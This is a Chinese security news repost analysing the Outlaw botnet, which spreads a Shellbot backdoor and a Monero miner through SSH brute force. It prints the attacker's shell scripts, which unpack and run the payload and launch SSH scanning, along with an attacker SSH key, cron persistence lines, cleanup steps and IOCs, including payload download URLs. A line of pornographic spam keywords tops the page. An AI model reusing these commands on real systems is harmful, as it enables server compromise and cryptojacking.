黄色网站入口国产美女,精品国产欧美另类一区,国产一区二区美女自慰,日日摸夜夜添无码国产

選擇你喜歡的標簽
我們會為你匹配適合你的網(wǎng)址導航

    確認 跳過

    跳過將刪除所有初始化信息

    您的位置:0XUCN > 資訊 > 安全
    新聞分類

    kswapd0進程過渡消耗CPU 亡命徒Outlaw漏洞修復

    安全 PRO 稿源:嘶吼RoarTalk 2021-12-23 19:08

    一、背景

    騰訊安全威脅情報中心檢測到國內(nèi)大量企業(yè)遭遇亡命徒(Outlaw)僵尸網(wǎng)絡(luò)攻擊。亡命徒(Outlaw)僵尸網(wǎng)絡(luò)最早于 2018 年被發(fā)現(xiàn),其主要特征為通過 SSH 爆破攻擊目標系統(tǒng),同時傳播基于 Perl 的 Shellbot 和門羅幣挖礦木馬。騰訊安全威脅情報中心安全大數(shù)據(jù)顯示,亡命徒(Outlaw)僵尸網(wǎng)絡(luò)已造成國內(nèi)約 2 萬臺 Linux 服務(wù)器感染,影響上萬家企業(yè)。

    此次攻擊傳播的母體文件為 dota3.tar.gz,可能為亡命徒(Outlaw)僵尸網(wǎng)絡(luò)的第 3 個版本,母體文件釋放 shell 腳本啟動對應(yīng)二進制程序,kswapd0 負責進行門羅幣挖礦,tsm32、tsm64 負責繼續(xù) SSH 爆破攻擊傳播病毒。

    亡命徒(Outlaw)僵尸網(wǎng)絡(luò)之前通過利用 Shellshock 漏洞進行分發(fā),因此被命名為 " Shellbot"。Shellbot 利用物聯(lián)網(wǎng)(IoT)設(shè)備和 Linux 服務(wù)器上的常見命令注入漏洞進行感染。Shellshock 漏洞 ( CVE-2014-7169 ) 是 2014 年在 Bash command shell 中發(fā)現(xiàn)的一個嚴重的漏洞,大多數(shù) Linux 發(fā)行版通常會使用到該功能,攻擊者可以在這些受影響的 Linux 服務(wù)器上遠程執(zhí)行代碼。

    二、樣本分析

    Outlaw 通過 SSH 爆破攻擊,訪問目標系統(tǒng)并下載帶有 shell 腳本、挖礦木馬、后門木馬的 TAR 壓縮包文件 dota3.tar.gz。解壓后的文件目錄可以看到,根目錄 rsync 下存放初始化腳本,a 目錄下存放 shellbot 后門,b 目錄下存放挖礦木馬,c 目錄下存放 SSH 爆破攻擊程序。

    C 目錄下二進制文件 tsm32、tsm64 為 SSH(22 端口)掃描和爆破程序,并可以通過執(zhí)行遠程命名來下載和執(zhí)行惡意程序。

    爆破成功后執(zhí)行 base64 編碼的 shell 命令,主要功能為刪除舊版本的惡意程序和目錄,然后解壓獲取到的最新版本惡意程序并執(zhí)行,內(nèi)容如下:

    命令 1:

    #!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*
mkdir .X25-unix
cd .X25-unix
mv ar/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd .rsync; cat /tmp/.X25-unix/.rsync/initall | bash 2>1&
sleep 45s && pkill -9 run && pkill -9 go && pkill -9 tsm
exit 0

    命令 2:

    sleep 3s && cd /tmp/.X25-unix/.rsync/c
nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1&

    還會通過遠程命令修改 SSH 公鑰為:

    AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw==

    以便之后能更容易入侵。

    B 目錄下 run 腳本主要內(nèi)容為 base64 編碼的 shellbot 后門程序,解碼后可以看到代碼仍然經(jīng)過混淆。

    把執(zhí)行函數(shù) eval 改為 print 可打印出解密后的代碼,是基于 Perl 的 Shellbot 變種,連接 C2 服務(wù)器地址為 45.9.148.99:443,能夠執(zhí)行多個后門命令,包括文件下載、執(zhí)行 shell cmd 和 DDoS 攻擊。

    A 目錄下二進制文件 kswapd0 為 XMRig 編譯的 Linux 平臺門羅幣挖礦木馬。

    在初始化階段會執(zhí)行腳本 init0 來找到大量 Linux 平臺競品挖礦木馬并進行清除。?

    在當前用戶目錄下創(chuàng)建 /.configrc 目錄,拷貝 a、b 文件夾到該目錄下并執(zhí)行初始化腳本,然后通過寫入 cron.d 安裝計劃任務(wù)進行持久化。寫入定時任務(wù)如下:

    1?1?*/2?*?*?$dir2/a/upd>/dev/null?2>&1
@reboot?$dir2/a/upd>/dev/null?2>&1
5?8?*?*?0?$dir2/b/sync>/dev/null?2>&1
@reboot?$dir2/b/sync>/dev/null?2>&1??
0?0?*/3?*?*?$dir/c/aptitude>/dev/null?2>&1

    三、安全建議

    建議企業(yè) Linux 服務(wù)器管理員檢查服務(wù)器資源占用情況,及時修改弱密碼,避免被暴力破解。若發(fā)現(xiàn)服務(wù)器已被入侵安裝挖礦木馬,可參考以下步驟手動檢查、清除:

    1、?刪除以下文件,殺死對應(yīng)進程:

    /tmp/*-unix/.rsync/a/kswapd0
*/.configrc/a/kswapd0
md5: 84945e9ea1950be3e870b798bd7c7559
/tmp/*-unix/.rsync/c/tsm64
md5: 4adb78770e06f8b257f77f555bf28065
/tmp/*-unix/.rsync/c/tsm32
md5: 10ea65f54f719bffcc0ae2cde450cb7a

    2、?檢查 cron.d 中是否存在包含以下內(nèi)容的定時任務(wù),如有進行刪除:

    /a/upd
/b/sync
/c/aptitude

    IOCs

    IP

    45.9.148.99
45.55.57.6
188.166.58.29
104.236.228.46
165.227.45.249
192.241.211.94
188.166.6.130
142.93.34.237
46.101.33.198
149.202.162.73
167.71.155.236
157.245.83.8
45.55.129.23
46.101.113.206
37.139.0.226
159.203.69.48
104.131.189.116
159.203.102.122
159.203.17.176
91.121.51.120
128.199.178.188
208.68.39.124
45.55.210.248
206.81.10.104
5.230.65.21
138.197.230.249
107.170.204.148

    Md5

    dota3.tar.gz
1a4592f48f8d1bf77895862e877181e0
kswapd0
84945e9ea1950be3e870b798bd7c7559
tsm64
4adb78770e06f8b257f77f555bf28065
tsm32
10ea65f54f719bffcc0ae2cde450cb7a
run
716e6b533f836cee5e480a413a84645a

    URL

    http [ : ] //45.55.57.6/dota3.tar.gz
http [ : ] //188.166.58.29/dota3.tar.gz
http [ : ] //104.236.228.46/dota3.tar.gz
http [ : ] //165.227.45.249/dota3.tar.gz
http [ : ] //192.241.211.94/dota3.tar.gz
http [ : ] //188.166.6.130/dota3.tar.gz
http [ : ] //142.93.34.237/dota3.tar.gz
http [ : ] //46.101.33.198/dota3.tar.gz
http [ : ] //149.202.162.73/dota3.tar.gz
http [ : ] //167.71.155.236/dota3.tar.gz
http [ : ] //157.245.83.8/dota3.tar.gz
http [ : ] //45.55.129.23/dota3.tar.gz
http [ : ] //46.101.113.206/dota3.tar.gz
http [ : ] //37.139.0.226/dota3.tar.gz
http [ : ] //159.203.69.48/dota3.tar.gz
http [ : ] //104.131.189.116/dota3.tar.gz
http [ : ] //159.203.102.122/dota3.tar.gz
http [ : ] //159.203.17.176/dota3.tar.gz
http [ : ] //91.121.51.120/dota3.tar.gz
http [ : ] //128.199.178.188/dota3.tar.gz
http [ : ] //208.68.39.124/dota3.tar.gz
http [ : ] //45.55.210.248/dota3.tar.gz
http [ : ] //206.81.10.104/dota3.tar.gz
http [ : ] //5.230.65.21/dota3.tar.gz
http [ : ] //138.197.230.249/dota3.tar.gz
http [ : ] //107.170.204.148/dota3.tar.gz

    0XU.CN

    [超站]友情鏈接:

    四季很好,只要有你,文娛排行榜:https://www.yaopaiming.com/
    關(guān)注數(shù)據(jù)與安全,洞悉企業(yè)級服務(wù)市場:https://www.ijiandao.com/

    *文章為作者獨立觀點,不代表 0XUCN 立場
    本文由 柔柔by雀眠發(fā)表,轉(zhuǎn)載此文章須經(jīng)作者同意,并請附上出處(0XUCN)及本頁鏈接。
    圖庫
    公眾號 關(guān)注網(wǎng)絡(luò)尖刀微信公眾號
    隨時掌握互聯(lián)網(wǎng)精彩
    贊助鏈接